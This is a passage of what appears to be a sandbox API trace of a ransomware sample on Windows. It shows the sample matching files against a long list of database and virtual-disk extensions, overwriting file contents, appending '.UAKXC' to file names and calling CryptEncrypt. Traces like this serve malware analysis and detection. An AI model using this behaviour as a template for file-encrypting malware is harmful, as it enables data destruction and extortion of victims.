(lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sdb") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sdc") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sdf") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sis") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".spq") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sql") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sqlite") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sqlite3") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sqlitedb") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".te") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".temx") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".tmd") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".tps") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".trc") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".trm") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".udb") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".udl") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".usr") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".v12") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vis") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vpd") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vvv") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".wdb") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".wmdb") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".wrk") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".xdb") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".xld") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".xmlff") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".abcddb") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".abs") returned 0x0 [0147.616] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".abx") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".accdw") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".adn") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".db2") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fm5") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".hjt") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".icg") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".icr") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".kdb") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".lut") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".maw") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".mdn") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".mdt") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vdi") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vhd") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vmdk") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".pvm") returned 0x0 [0147.617] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vmem") returned 0x0 [0147.618] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vmsn") returned 0x0 [0147.618] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vmsd") returned 0x0 [0147.618] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".nvram") returned 0x0 [0147.618] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vmx") returned 0x0 [0147.618] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".raw") returned 0x0 [0147.618] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".qcow2") returned 0x0 [0147.618] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".subvol") returned 0x0 [0147.618] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".bin") returned 0x0 [0147.618] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vsv") returned 0x0 [0147.619] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".avhd") returned 0x0 [0147.619] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vmrs") returned 0x0 [0147.619] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vhdx") returned 0x0 [0147.619] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".avdx") returned 0x0 [0147.619] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".vmcx") returned 0x0 [0147.619] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".iso") returned 0x0 [0147.619] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.619] WriteFile (in: hFile=0x6ec, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0147.620] WriteFile (in: hFile=0x6ec, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0147.620] SetEndOfFile (hFile=0x6ec) returned 1 [0147.621] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.621] ReadFile (in: hFile=0x6ec, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x80000, lpOverlapped=0x0) returned 1 [0147.645] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xfff80000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.645] WriteFile (in: hFile=0x6ec, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x80000, lpOverlapped=0x0) returned 1 [0147.647] CloseHandle (hObject=0x6ec) returned 1 [0147.653] GetProcessHeap () returned 0xea0000 [0147.653] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xf214b0 [0147.654] lstrcpyW (in: lpString1=0xf214b0, lpString2="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0147.654] lstrcatW (in: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".UAKXC" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.UAKXC") returned="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.UAKXC" [0147.688] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.UAKXC" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.uakxc")) returned 1 [0147.688] GetProcessHeap () returned 0xea0000 [0147.688] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf214b0 | out: hHeap=0xea0000) returned 1 [0147.690] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef45c0 | out: hHeap=0xea0000) returned 1 [0147.690] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2dd0 | out: hHeap=0xea0000) returned 1 [0147.690] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0147.690] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0147.690] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0147.690] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0147.784] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0147.784] GetLastError () returned 0x0 [0147.784] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=2296) returned 1 [0147.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dd") returned 0x0 [0147.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dl") returned 0x0 [0147.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdb") returned 0x0 [0147.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdc") returned 0x0 [0147.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accde") returned 0x0 [0147.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdr") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdt") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accft") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adb") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ade") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adf") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adp") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".arc") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ora") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".alf") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ask") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".btr") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bdf") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cat") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cdb") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ckp") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cma") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cpd") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dacpac") returned 0x0 [0147.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dad") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dadiagrams") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".daschema") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-shm") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-wal") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db3") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbc") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbf") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbs") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbt") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbv") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbx") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcb") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dct") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcx") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ddl") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dlis") returned 0x0 [0147.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dp1") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dqy") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsk") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsn") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dtsx") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dxl") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".eco") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ecx") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".edb") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".epim") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".exb") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fcd") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fdb") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fic") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp12") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmpsl") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fol") returned 0x0 [0147.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp3") returned 0x0 [0147.788] StrStrIW 